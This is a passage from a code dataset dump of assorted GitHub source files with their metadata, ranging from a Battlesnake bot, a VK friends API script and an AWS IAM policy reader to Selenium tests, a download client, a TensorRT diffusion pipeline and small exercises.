print(f'Перевод слова \"{english_word}\": {self.dictionary[english_word]}')\n else:\n print(f'Слово \"{english_word}\" не найдено в словаре.')\n\n def update_translation(self, english_word, new_french_translation):\n if english_word in self.dictionary:\n self.dictionary[english_word] = new_french_translation\n print(f'Перевод для слова \"{english_word}\" обновлен на \"{new_french_translation}\".')\n else:\n print(f'Слово \"{english_word}\" не найдено в словаре.')\n\n def display_dictionary(self):\n print(\"Содержимое словаря:\")\n for english_word, french_translation in self.dictionary.items():\n print(f'{english_word} - {french_translation}')\n\n\ndictionary = EnglishFrenchDictionary()\n\ndictionary.add_word(\"hello\", \"bonjour\")\ndictionary.add_word(\"world\", \"monde\")\n\ndictionary.display_dictionary()\n\ndictionary.search_translation(\"hello\")\ndictionary.search_translation(\"goodbye\")\n\ndictionary.update_translation(\"hello\", \"salut\")\n\ndictionary.display_dictionary()\n\ndictionary.delete_word(\"world\")\n\ndictionary.display_dictionary()\n\n\n\n\n\ndef set_gen(numbers):\n result_set = set()\n\n for number in numbers:\n if numbers.count(number) > 1:\n result_set.add(str(number) * numbers.count(number))\n else:\n result_set.add(number)\n\n return result_set\n\ninput_numbers = [1, 2, 3, 4, 4, 4, 5, 6, 6, 6, 6]\nresult_set = set_gen(input_numbers)\n\nprint(\"Исходный список:\", input_numbers)\nprint(\"Множество с учетом условий:\", result_set)\n\n","repo_name":"Artutev/15.06.23","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4949,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13858077010","text":"import copy\n\ndef avoid_my_neck_and_walls(my_head, my_body, snakes, possible_moves):\n my_neck = my_body[1] # The segment of body right after the head is the 'neck'\n\n if my_neck[\"x\"] < my_head[\"x\"]: # my neck is left of my head\n possible_moves.remove(\"left\")\n elif my_neck[\"x\"] > my_head[\"x\"]: # my neck is right of my head\n possible_moves.remove(\"right\")\n elif my_neck[\"y\"] < my_head[\"y\"]: # my neck is below my head\n possible_moves.remove(\"down\")\n elif my_neck[\"y\"] > my_head[\"y\"]: # my neck is above my head\n possible_moves.remove(\"up\")\n \n if my_head[\"x\"] == 10:\n possible_moves.remove(\"right\")\n elif my_head[\"x\"] == 0:\n possible_moves.remove(\"left\")\n\n# if {\"x\": my_head[\"x\"], \"y\": my_head[\"y\"]} in my_body:\n \n if my_head[\"y\"] == 10:\n possible_moves.remove(\"up\")\n elif my_head[\"y\"] == 0:\n possible_moves.remove(\"down\")\n\n # for i in range()\n\n return possible_moves\n\n\ndef avoid_snakes(my_head, snakes, possible_moves, length):\n grid = [\n [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\n ]\n\n # Create grid\n for snakeIndex in range(len(snakes)):\n for bodyIndex in range(len(snakes[snakeIndex][\"body\"])-1):\n # Adds every part except the tail\n grid[snakes[snakeIndex][\"body\"][bodyIndex][\"y\"]][snakes[snakeIndex][\"body\"][bodyIndex][\"x\"]] = 1\n\n # Adds the possible ways a snake head could move if it has more health\n if snakes[snakeIndex][\"body\"][0] != my_head and snakes[snakeIndex][\"length\"] >= length:\n if snakes[snakeIndex][\"body\"][0][\"x\"] - 1 >= 0:\n grid[snakes[snakeIndex][\"body\"][0][\"y\"]][snakes[snakeIndex][\"body\"][0][\"x\"]-1] = 1\n if snakes[snakeIndex][\"body\"][0][\"x\"] + 1 <= 10:\n grid[snakes[snakeIndex][\"body\"][0][\"y\"]][snakes[snakeIndex][\"body\"][0][\"x\"]+1] = 1\n if snakes[snakeIndex][\"body\"][0][\"y\"] - 1 >= 0:\n grid[snakes[snakeIndex][\"body\"][0][\"y\"]-1][snakes[snakeIndex][\"body\"][0][\"x\"]] = 1\n if snakes[snakeIndex][\"body\"][0][\"y\"] + 1 <= 10:\n grid[snakes[snakeIndex][\"body\"][0][\"y\"]+1][snakes[snakeIndex][\"body\"][0][\"x\"]] = 1\n\n # Remove killing moves using grid\n if \"up\" in possible_moves and grid[my_head[\"y\"]+1][my_head[\"x\"]] == 1:\n possible_moves.remove(\"up\")\n if \"down\" in possible_moves and grid[my_head[\"y\"]-1][my_head[\"x\"]] == 1:\n possible_moves.remove(\"down\")\n if \"left\" in possible_moves and grid[my_head[\"y\"]][my_head[\"x\"]-1] == 1:\n possible_moves.remove(\"left\")\n if \"right\" in possible_moves and grid[my_head[\"y\"]][my_head[\"x\"]+1] == 1:\n possible_moves.remove(\"right\")\n \n return possible_moves\n \n # if {\"x\": my_head[\"x\"], \"y\": my_head[\"y\"]} in my_body:\n # my_body.remove({\"x\": my_head[\"x\"], \"y\": my_head[\"y\"]})\n\n\n\ndef find_food(my_head, food, possible_moves):\n closestFood = {\"x\": 5, \"y\": 5}\n closestDist = 50\n \n for i in range(len(food)):\n dist = abs(my_head[\"x\"] - food[i][\"x\"]) + abs(my_head[\"y\"] - food[i][\"y\"])\n #print(dist, closestDist)\n if dist < closestDist:\n closestDist = dist\n closestFood = food[i]\n \n xDiff = abs(my_head[\"x\"] - closestFood[\"x\"])\n yDiff = abs(my_head[\"y\"] - closestFood[\"y\"])\n\n execute = True\n if xDiff > yDiff:\n execute = False\n if my_head[\"x\"] > closestFood[\"x\"]:\n choice = \"left\"\n else:\n choice = \"right\"\n \n if choice not in possible_moves:\n execute = True\n\n if execute:\n if my_head[\"y\"] > closestFood[\"y\"]:\n choice = \"down\"\n else:\n choice = \"up\"\n \n if choice not in possible_moves:\n return possible_moves[0]\n \n return choice\n\ndef simulate_move(my_head, my_body, snakes, food, length):\n try:\n possible_moves = list([\"up\", \"down\", \"left\", \"right\"])\n possible_moves = avoid_my_neck_and_walls(my_head, my_body, snakes, possible_moves)\n possible_moves = avoid_snakes(my_head, snakes, possible_moves, length)\n move = find_food(my_head, food, possible_moves)\n except:\n return \"dead\"\n\n if len(possible_moves) == 0:\n move = \"dead\"\n \n return move\n\ndef simulate_future(possible_moves, data):\n not_possible_moves = list([])\n dataOrigin = copy.deepcopy(data)\n for myMove in ((possible_moves)):\n data = copy.deepcopy(dataOrigin)\n for turnIndex in range(10): # num turns ahead\n snakeIndex = 0\n dataHolder = copy.deepcopy(data)\n shouldBreak = False\n for asdf in range(len(data[\"board\"][\"snakes\"])):\n \n if (data[\"board\"][\"snakes\"][snakeIndex][\"id\"] == data[\"you\"][\"id\"] and turnIndex == 0):\n move = myMove\n else:\n move = simulate_move(dataHolder[\"board\"][\"snakes\"][snakeIndex][\"head\"], dataHolder[\"board\"][\"snakes\"][snakeIndex][\"body\"], dataHolder[\"board\"][\"snakes\"], dataHolder[\"board\"][\"food\"], dataHolder[\"board\"][\"snakes\"][snakeIndex][\"length\"])\n\n #print(move, data[\"turn\"])\n if move == \"dead\":\n if data[\"board\"][\"snakes\"][snakeIndex][\"id\"] == data[\"you\"][\"id\"]:\n not_possible_moves.append([myMove, turnIndex])\n shouldBreak = True\n break\n \n del data[\"board\"][\"snakes\"][snakeIndex]\n snakeIndex -= 1\n\n # moves the head\n elif move == \"up\":\n data[\"board\"][\"snakes\"][snakeIndex][\"head\"][\"y\"] += 1\n\n elif move == \"right\":\n data[\"board\"][\"snakes\"][snakeIndex][\"head\"][\"x\"] += 1\n\n elif move == \"down\":\n data[\"board\"][\"snakes\"][snakeIndex][\"head\"][\"y\"] -= 1\n\n elif move == \"left\":\n data[\"board\"][\"snakes\"][snakeIndex][\"head\"][\"x\"] -= 1\n \n # print(data[\"board\"][\"snakes\"])\n # print(data[\"board\"][\"snakes\"], shouldBreak)\n for bodyIndex in range(len(data[\"board\"][\"snakes\"][snakeIndex][\"body\"])-1, 0, -1):\n data[\"board\"][\"snakes\"][snakeIndex][\"body\"][bodyIndex] = data[\"board\"][\"snakes\"][snakeIndex][\"body\"][bodyIndex-1].copy()\n \n data[\"board\"][\"snakes\"][snakeIndex][\"body\"][0] = data[\"board\"][\"snakes\"][snakeIndex][\"head\"].copy()\n \n foodIndex = 0\n for i in range(len(data[\"board\"][\"food\"])):\n if data[\"board\"][\"food\"][foodIndex] == data[\"board\"][\"snakes\"][snakeIndex][\"head\"]:\n del data[\"board\"][\"food\"][foodIndex]\n foodIndex -= 1\n foodIndex += 1\n \n snakeIndex += 1\n # print(\"--------------------\")\n # print(data[\"turn\"], myMove, data[\"board\"][\"snakes\"][0][\"body\"])\n if shouldBreak:\n break\n \n \n # print(data[\"board\"][\"snakes\"][0][\"body\"], data[\"turn\"])\n\n \n # print(possible_moves, not_possible_moves, data[\"turn\"])\n for i in range(len(not_possible_moves)):\n possible_moves.remove(not_possible_moves[i][0])\n \n if len(possible_moves) == 0:\n mostTurns = 0\n for i in range(len(not_possible_moves)):\n if not_possible_moves[i][1] > mostTurns:\n possible_moves = list([])\n possible_moves.append(not_possible_moves[i][0])\n return possible_moves\n \ndef choose_move(data: dict) -> str:\n my_head = data[\"you\"][\"head\"] # A dictionary of x/y coordinates like {\"x\": 0, \"y\": 0}\n my_body = data[\"you\"][\"body\"] # A list of x/y coordinate dictionaries like [ {\"x\": 0, \"y\": 0}, {\"x\": 1, \"y\": 0}, {\"x\": 2, \"y\": 0} ]\n\n snakes = data[\"board\"][\"snakes\"]\n\n\n possible_moves = [\"up\", \"down\", \"left\", \"right\"]\n # direction = helper.handler(data.get('you'), data.get('snakes'), data.get('food'))\n\n # Don't allow your Battlesnake to move back in on it's own neck\n possible_moves = avoid_my_neck_and_walls(my_head, my_body, snakes, possible_moves)\n possible_moves = avoid_snakes(my_head, snakes, possible_moves, data[\"you\"][\"length\"])\n\n if data[\"turn\"] > 4:\n data_copy = copy.deepcopy(data)\n possible_moves = simulate_future(possible_moves, data_copy)\n\n move = find_food(my_head, data[\"board\"][\"food\"], possible_moves)\n\n # print(f\"{data['game']['id']} MOVE {data['turn']}: {move} picked from all valid options in {possible_moves}\")\n # pp.pprint(data)\n\n return move\n","repo_name":"vivekbw/BattleSnake","sub_path":"app/server_logic.py","file_name":"server_logic.py","file_ext":"py","file_size_in_byte":8322,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16401619959","text":"# /usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport requests\nimport json\n\nwith open(r'token.txt', 'r', encoding='windows-1251') as f:\n access_token = f.read()\nhelp = 'Для того, чтобы узнать закрытых друзей пользователя, введите его id.\\n' \\\n 'Чтобы выйти из программы, введите \"end\".\\n' \\\n 'Для корректного результата страница пользователя должна существовать и быть открытой.\\n'\n\n\nclass VkApi:\n def __init__(self, access_token):\n self.access_token = access_token\n self.request = \"https://api.vk.com/method/\"\n print('Данная программа позволяет узнать список друзей пользователя ВКонтакте, имеющих закрытый профиль.\\n'\n '(при условии, что пользователь существует и имеет открытый профиль)\\n'\n 'Давыдова Влада, КН-201 (МЕН-280206)\\n')\n\n def main(self):\n while True:\n user_id = input(\"Введите id пользователя.\\n\")\n if user_id == \"end\":\n break\n if user_id == \"help\":\n print(help)\n else:\n closed_friends = self.get_closed_friends(user_id)\n for friend in closed_friends:\n print(friend)\n\n def get_friends(self, user_id):\n request = self.request + f\"friends.get?user_id={user_id}&fields=nickname,%20domain&v=5.103&access_token={self.access_token}\"\n r = requests.get(request)\n # print(r.text)\n if 'error' in r.text:\n print('Пользователь удалён или имеет закрытый профиль.')\n return []\n return json.loads(r.text)['response']['items']\n\n def get_closed_friends(self, user_id):\n data = self.get_friends(user_id)\n closed_friends = []\n for user in data:\n if 'is_closed' in user:\n if user['is_closed']:\n closed_friends.append(f'{user[\"first_name\"]} {user[\"last_name\"]}')\n return closed_friends\n\n\nif __name__ == '__main__':\n api = VkApi(access_token)\n api.main()\n","repo_name":"songerman/task8","sub_path":"program.py","file_name":"program.py","file_ext":"py","file_size_in_byte":2359,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9113148418","text":"import mlSandbox\nimport tkinter as Tk\nimport pandas as pd\nimport os\nimport matplotlib.pyplot as plt\nimport matplotlib.dates as mdates\nfrom mpl_toolkits import mplot3d\nimport GuiOption\n\nclass CountryGui:\n\n def __init__(self, dataFrame, options, xAxisName):\n countries = list(set(dataFrame.index.values))\n countries.sort()\n\n self.root = Tk.Tk()\n self.root.title(\"Select Country To View Data\")\n self.root.geometry(\"400x300\")\n self.xAxisName = xAxisName\n \n self.pick = Tk.StringVar()\n self.pick.set(countries[0])\n self.optionsMenu = Tk.OptionMenu(self.root, self.pick, *countries)\n self.options = options\n\n self.graphPick = Tk.IntVar()\n self.graphPick.set(1)\n self.radButtons = []\n if self.options:\n for key in self.options:\n self.radButtons.append(Tk.Radiobutton(self.root,text = self.options[key].displayName, variable = self.graphPick, value = key))\n \n self.dataFrame = dataFrame\n self.countryContainer = set([])\n self.buttonFrame = Tk.Frame(self.root)\n self.plotButton = Tk.Button(self.root, text = \"Plot Data\", command = self.plotData)\n self.addButton = Tk.Button(self.buttonFrame, text = \"Add Country\", command = self.addCountry)\n self.clearButton = Tk.Button(self.buttonFrame, text = \"Clear Countries\", command = self.clearCountries)\n self.Label = Tk.Label(self.root, text = \"Countries To Display Below\")\n self.listBox = Tk.Listbox(self.root)\n \n self.optionsMenu.pack()\n self.buttonFrame.pack()\n self.addButton.pack(side = Tk.LEFT)\n self.clearButton.pack(side = Tk.RIGHT)\n for rad in self.radButtons:\n rad.pack()\n self.plotButton.pack()\n self.Label.pack()\n self.listBox.pack()\n \n Tk.mainloop()\n \n def plotData(self):\n fig, ax = plt.subplots()\n \n pickLocal = self.graphPick.get()\n displayName = self.options[pickLocal].displayName\n pandasName = self.options[pickLocal].pandasName\n \n plt.xlabel(self.xAxisName)\n plt.ylabel(displayName)\n plt.title(\"{} vs {}\".format(displayName, self.xAxisName))\n if self.xAxisName == 'date':\n months = mdates.MonthLocator() # every month\n months_fmt = mdates.DateFormatter('%b')\n \n for country in self.countryContainer:\n country = self.dataFrame.loc[country]\n xData = list(country[self.xAxisName])\n yData = list(country[pandasName])\n plt.plot(xData, yData, 'o', label = country.index[0])\n if self.xAxisName == 'date':\n ax.xaxis.set_major_locator(months)\n ax.xaxis.set_major_formatter(months_fmt)\n fig.autofmt_xdate()\n \n plt.legend(loc = \"upper left\") \n plt.show()\n\n def addCountry(self):\n pickLocal = self.pick.get()\n if pickLocal not in self.dataFrame.index or pickLocal in self.countryContainer:\n return\n\n self.countryContainer.add(pickLocal)\n self.listBox.insert(Tk.END, pickLocal)\n \n def clearCountries(self):\n self.countryContainer.clear()\n self.listBox.delete(0, Tk.END)","repo_name":"Michael-Paluda/mlSandbox","sub_path":"countryGUI.py","file_name":"countryGUI.py","file_ext":"py","file_size_in_byte":3294,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"527609918","text":"from dataclasses import dataclass\nfrom typing import Dict\n\nfrom aws_ptrp.iam.policy import Policy\nfrom aws_ptrp.iam.policy.policy_document import PolicyDocument, PolicyDocumentCtx\nfrom aws_ptrp.utils.pagination import paginate_response_list\nfrom boto3 import Session\nfrom serde import from_dict, serde\n\n\n@serde\n@dataclass\nclass IAMPolicy:\n policy: Policy\n policy_document: PolicyDocument\n\n def __eq__(self, other):\n return self.policy.policy_id == other.policy.policy_id\n\n def __hash__(self):\n return hash(self.policy.policy_id)\n\n def __repr__(self):\n return self.policy.arn\n\n @staticmethod\n def extract_aws_account_id_from_arn_of_iam_entity(arn: str) -> str:\n return arn[arn.find(\":iam::\") + 6 : arn.find(\":policy/\")]\n\n def to_policy_document_ctx(self) -> PolicyDocumentCtx:\n aws_account_id = IAMPolicy.extract_aws_account_id_from_arn_of_iam_entity(self.policy.arn)\n return PolicyDocumentCtx(\n policy_document=self.policy_document,\n policy_name=self.policy.policy_name,\n parent_arn=self.policy.arn,\n parent_aws_account_id=aws_account_id,\n )\n\n\ndef get_iam_policies(session: Session) -> Dict[str, IAMPolicy]:\n iam_client = session.client('iam')\n ret: Dict[str, IAMPolicy] = {}\n\n list_policies = paginate_response_list(iam_client.list_policies, 'Policies', OnlyAttached=True)\n for list_policy_response in list_policies:\n # Due to the comment in the aws API for list_policies we are using the get_policy for each policy\n # \"IAM resource-listing operations return a subset of the available attributes for the resource. For example, this operation does not return tags, even though they are an attribute of the returned object. To view all of the information for a customer manged policy, see GetPolicy.\"\n arn = list_policy_response['Arn']\n policy_response = iam_client.get_policy(PolicyArn=arn)['Policy']\n policy: Policy = from_dict(Policy, policy_response) # type: ignore\n\n policy_version_response = iam_client.get_policy_version(PolicyArn=arn, VersionId=policy.default_version_id)\n policy_version_response = policy_version_response['PolicyVersion']['Document']\n policy_document: PolicyDocument = from_dict(PolicyDocument, policy_version_response) # type: ignore\n ret[policy.arn] = IAMPolicy(\n policy=policy,\n policy_document=policy_document,\n )\n return ret\n","repo_name":"SatoriCyber/universal-data-permissions-scanner","sub_path":"universal_data_permissions_scanner/datastores/aws/aws_ptrp_package/aws_ptrp/iam/iam_policies.py","file_name":"iam_policies.py","file_ext":"py","file_size_in_byte":2481,"program_lang":"python","lang":"en","doc_type":"code","stars":73,"dataset":"github-code","pt":"53"} +{"seq_id":"32157345457","text":"from selenium import webdriver\nfrom Libraries import configRead\nfrom Pages import Bootstrap_Date_picker\nfrom Pages import jQuery_Date_picker\nfrom Assersions import Forms_Assersions\nfrom Pages import Simple_Form_Demo\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support.select import Select\nimport time\nimport pytest\nimport datetime\n\ndef test_008_TC_checkboxes1_section_heading(startbrowser):\n driver = startbrowser[0]\n wait = startbrowser[1]\n mouseaction = startbrowser[2]\n driver.find_element_by_xpath(\"//a[contains(text(),'Input Forms')]\").click()\n driver.find_element_by_xpath(\"//a[contains(text(),'Checkbox Demo')]\").click()\n #heading = driver.find_element_by_xpath(\"//div[text()='Single Checkbox Demo']\").text\n #assert heading ==\"Single Checkbox Demo\"\n\ndef test_009_TC_validate_checkbox1(startbrowser):\n driver = startbrowser[0]\n wait = startbrowser[1]\n mouseaction = startbrowser[2]\n driver.find_element_by_xpath(\"//input[@id='isAgeSelected']\").click()\n #status = driver.find_element_by_xpath(\"//input[@id='isAgeSelected']\").is_enabled()\n #assert status == True\n driver.find_element_by_xpath(\"//input[@id='isAgeSelected']\").click()\n\ndef test_010_TC_Multiple_Checkbox_Demo_heading(startbrowser):\n driver = startbrowser[0]\n wait = startbrowser[1]\n mouseaction = startbrowser[2]\n heading = driver.find_element_by_xpath(\"//div[text()='Multiple Checkbox Demo']\").text\n #assert heading ==\"Multiple Checkbox Demo\"\n\ndef test_011_TC_Multiple_checkbox_select(startbrowser):\n driver = startbrowser[0]\n wait = startbrowser[1]\n mouseaction = startbrowser[2]\n driver.find_element_by_xpath(\"//label[text()='Option 1']\").click()\n time.sleep(1)\n driver.find_element_by_xpath(\"//label[text()='Option 2']\").click()\n time.sleep(1)\n driver.find_element_by_xpath(\"//label[text()='Option 3']\").click()\n time.sleep(1)\n driver.find_element_by_xpath(\"//label[text()='Option 4']\").click()\n time.sleep(1)\n attvalue = driver.find_element_by_xpath(\"//input[@id='check1']\").get_attribute(\"value\")\n #assert attvalue == \"Uncheck All\"\n\ndef test_012_TC_uncheck_all_checkbox_click(startbrowser):\n driver = startbrowser[0]\n wait = startbrowser[1]\n mouseaction = startbrowser[2]\n driver.find_element_by_xpath(\"//input[@id='check1']\").click()\n checkbox_state = driver.find_element_by_xpath(\"//input[@id='check1']\").get_attribute(\"value\")\n #assert checkbox_state ==\"Check All\"\n\n\n\n\n\n\n\n\n","repo_name":"aashishdalmiapython/Jenkin_SampleProject2","sub_path":"TestCases/test_01_Checkboxes_Suite.py","file_name":"test_01_Checkboxes_Suite.py","file_ext":"py","file_size_in_byte":2722,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28507233235","text":"from typing import List, Union\n\nfrom aiodown.types import Download\n\n\nclass Client:\n \"\"\"aiodown Client, where you can remove and/or add files from/in the download list.\n\n Parameters:\n workers (``int``, *optional*):\n Number of workers for each download\n Default to 8.\n \"\"\"\n\n def __init__(self, workers: int = 8):\n self._workers = workers\n self._running = False\n self._downloads = {}\n\n async def __aenter__(self):\n return self\n\n async def __aexit__(self, *args):\n return None\n\n def add(\n self, url: str, path: str = None, retries: int = 3, workers: int = None\n ) -> Download:\n \"\"\"Adds a file to the download list.\n\n Parameters:\n url (``str``):\n Direct file link.\n\n path (``str``, *optional*):\n File download location.\n\n retries (``int``, *optional*):\n Number of download retries in case of failure.\n\n workers (``int``, *optional*):\n Number of workers for each download.\n Default to 8.\n\n Returns:\n :obj:`aiodown.types.Download`: The download object.\n \"\"\"\n\n if self.is_running():\n raise RuntimeError(\n \"There are some downloads in progress, cancel them first or wait for them to finish\"\n )\n\n dl_id = len(self._downloads.keys())\n dl = Download(url, path, retries, self, workers or self._workers)\n dl._id = dl_id\n self._downloads[dl_id] = dl\n\n return dl\n\n def rem(self, dl_id: Union[bool, int]):\n \"\"\"Removes one or all files from the download list.\n\n Parameters:\n dl_id (``int``, ``True``):\n Removes the download from the list with the specified id,\n if True removes all downloads from the list.\n\n Raises:\n KeyError: In case the dl_id is invalid.\n RuntimeError: In case of have a download in progress.\n TypeError: In case the dl_id is False.\n \"\"\"\n\n if isinstance(dl_id, bool):\n if not dl_id:\n raise TypeError(\n \"You can only use 'client.rem(True)' or 'client.rem(id)' and not 'client.rem(False)'\"\n )\n if self.is_running():\n raise RuntimeError(\n \"There are some downloads in progress, cancel them first or wait for them to finish\"\n )\n else:\n self._downloads = {}\n else:\n if dl_id not in self._downloads.keys():\n raise KeyError(f\"There is no download with id '{dl_id}'\")\n\n if self._downloads[dl_id].is_finished():\n del self._downloads[dl_id]\n else:\n raise RuntimeError(\"The download is in progress, cancel it first\")\n\n async def start(self):\n \"\"\"Starts all downloads in the list.\n\n Raises:\n RuntimeError: In case of have a download in progress.\"\"\"\n\n if self.is_running():\n raise RuntimeError(\"Downloads have already started\")\n\n for _download in self._downloads.values():\n await _download.start()\n\n self._running = True\n\n async def stop(self):\n \"\"\"Stop all downloads in the list.\n\n Raises:\n RuntimeError: In case of not have a download in progress.\"\"\"\n\n if not self.is_running():\n raise RuntimeError(\"There is no download in progress\")\n\n for _download in self._downloads.values():\n await _download.stop()\n\n self._running = False\n\n def check_is_running(self):\n \"\"\"Checks if a download is still in progress.\"\"\"\n\n for _download in self._downloads.values():\n if _download.is_finished():\n continue\n else:\n return\n\n self._running = False\n\n def is_running(self) -> bool:\n \"\"\"Checks whether the client is running.\n\n Returns:\n ``bool``: Whether it's running or not.\n \"\"\"\n\n return self._running\n\n def get_downloads(self) -> List[Download]:\n \"\"\"Get the list of downloads.\n\n Returns:\n List of :obj:`aiodown.types.Download`: List of download objects.\n \"\"\"\n\n return self._downloads.values()\n","repo_name":"AmanoTeam/aiodown","sub_path":"aiodown/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":4344,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"70315233767","text":"import numpy as np\nimport nvtx\nimport time\nimport torch\nimport tensorrt as trt\nfrom utilities import TRT_LOGGER\nfrom stable_diffusion_pipeline import StableDiffusionPipeline\n\nclass Txt2ImgPipeline(StableDiffusionPipeline):\n \"\"\"\n Application showcasing the acceleration of Stable Diffusion Txt2Img v1.4, v1.5, v2.0, v2.0-base, v2.1, v2.1-base pipeline using NVidia TensorRT w/ Plugins.\n \"\"\"\n def __init__(\n self,\n scheduler=\"DDIM\",\n *args, **kwargs\n ):\n \"\"\"\n Initializes the Txt2Img Diffusion pipeline.\n\n Args:\n scheduler (str):\n The scheduler to guide the denoising process. Must be one of the [DPM, LMSD, DDIM, EulerA, PNDM].\n \"\"\"\n super(Txt2ImgPipeline, self).__init__(*args, **kwargs, \\\n scheduler=scheduler, stages=['clip','unet','vae'])\n\n def infer(\n self,\n prompt,\n negative_prompt,\n image_height,\n image_width,\n seed=None,\n warmup=False,\n verbose=False\n ):\n \"\"\"\n Run the diffusion pipeline.\n\n Args:\n prompt (str):\n The text prompt to guide image generation.\n negative_prompt (str):\n The prompt not to guide the image generation.\n image_height (int):\n Height (in pixels) of the image to be generated. Must be a multiple of 8.\n image_width (int):\n Width (in pixels) of the image to be generated. Must be a multiple of 8.\n seed (int):\n Seed for the random generator\n warmup (bool):\n Indicate if this is a warmup run.\n verbose (bool):\n Verbose in logging\n \"\"\"\n assert len(prompt) == len(negative_prompt)\n\n with torch.inference_mode(), torch.autocast(\"cuda\"), trt.Runtime(TRT_LOGGER):\n # Pre-initialize latents\n latents = self.initialize_latents( \\\n batch_size=len(prompt), \\\n unet_channels=4, \\\n latent_height=(image_height // 8), \\\n latent_width=(image_width // 8)\n )\n\n torch.cuda.synchronize()\n e2e_tic = time.perf_counter()\n\n # CLIP text encoder\n text_embeddings = self.encode_prompt(prompt, negative_prompt)\n\n # UNet denoiser\n latents = self.denoise_latent(latents, text_embeddings)\n\n # VAE decode latent\n images = self.decode_latent(latents)\n\n torch.cuda.synchronize()\n e2e_toc = time.perf_counter()\n\n if not warmup:\n self.print_summary(self.denoising_steps, e2e_tic, e2e_toc)\n self.save_image(images, 'txt2img', prompt)\n","repo_name":"NVIDIA/TensorRT","sub_path":"demo/Diffusion/txt2img_pipeline.py","file_name":"txt2img_pipeline.py","file_ext":"py","file_size_in_byte":2767,"program_lang":"python","lang":"en","doc_type":"code","stars":8187,"dataset":"github-code","pt":"53"} +{"seq_id":"4979006001","text":"from django.db import models\nfrom django.conf import settings\n\n\nclass GoogleCalendar(models.Model):\n user = models.ForeignKey(settings.AUTH_USER_MODEL,\n on_delete=models.CASCADE, unique=True)\n access_token = models.TextField(\n blank=True,\n verbose_name=\"Access token\",\n )\n refresh_token = models.TextField(\n blank=True,\n verbose_name=\"Refresh token\",\n )\n created = models.DateTimeField(auto_now_add=True)\n updated = models.DateTimeField(auto_now=True)\n","repo_name":"oldi92/django-react-oauth","sub_path":"backend/integrations/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"18206150400","text":"\"\"\" Palindrome Check: Given a string find if it is a palindrome using recursion \"\"\"\n\n\"\"\"Solution: Recursively make the string shorter until length is two or one, if two compare both and return value \"\"\"\n\n\ndef palindrome_check(a) -> bool:\n if len(a) == 1 or len(a) == 0:\n return True\n return a[0] == a[-1] and palindrome_check(a[1:-1])\n\n\ndef main():\n val1 = input(\"Enter your string: \")\n if palindrome_check(val1):\n print(\"Yes\")\n else:\n print(\"No\")\n\n\n# Using the special variable\n# __name__\nif __name__ == \"__main__\":\n main()\n","repo_name":"lakshyarawal/pythonPractice","sub_path":"Recursion/palindrome_check.py","file_name":"palindrome_check.py","file_ext":"py","file_size_in_byte":564,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"11234356214","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Nov 10 19:59:27 2020\r\n\r\n@author: alankar\r\n\"\"\"\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport mpl_toolkits.mplot3d as plt3d\r\nfrom operator import itemgetter\r\nfrom mayavi import mlab\r\n\r\nvertices = np.loadtxt('data-verts.txt')[:,1:]\r\nvertno = np.array(np.loadtxt('data-verts.txt')[:,0],dtype=np.int64) - 1\r\nsorter = sorted(zip(vertno,vertices), key=itemgetter(0))\r\n_, vertices = zip(*sorter)\r\nvertices = np.array(vertices)\r\n\r\nedges = np.array(np.loadtxt('data-edges.txt')[:,1:],dtype=np.int64) - 1 \r\nedgeno = np.array(np.loadtxt('data-edges.txt')[:,0],dtype=np.int64) - 1\r\nsorter = sorted(zip(edgeno,edges), key=itemgetter(0))\r\n_, edges = zip(*sorter)\r\nedges = np.array(edges, dtype=np.int64)\r\n\r\nfaces = np.array(np.abs(np.loadtxt('data-faces.txt'))[:,1:-1],dtype=np.int64) - 1\r\nfaceno = np.array(np.loadtxt('data-faces.txt')[:,0],dtype=np.int64) - 1\r\nsorter = sorted(zip(faceno,faces), key=itemgetter(0))\r\n_, faces = zip(*sorter)\r\nfaces = np.array(faces, dtype=np.int64)\r\n\r\nconnectivity = np.zeros(faces.shape, dtype=np.int64)\r\nfor i in range(faces.shape[0]):\r\n this_verts = []\r\n this_edges = faces[i]\r\n for j in range(3): this_verts.append(edges[this_edges[j]])\r\n this_verts = np.array(this_verts, dtype=np.int64).flatten()\r\n this_verts = np.unique(this_verts)\r\n connectivity[i,:] = this_verts\r\n\r\nfig = plt.figure()\r\nfig.set_size_inches(20,20)\r\nax = fig.add_subplot(111, projection='3d', aspect='auto')\r\nax.view_init(azim=120)\r\n\r\n#plot the nodes\r\nfor x, y, z in vertices:\r\n ax.scatter(x, y, z, color='black', 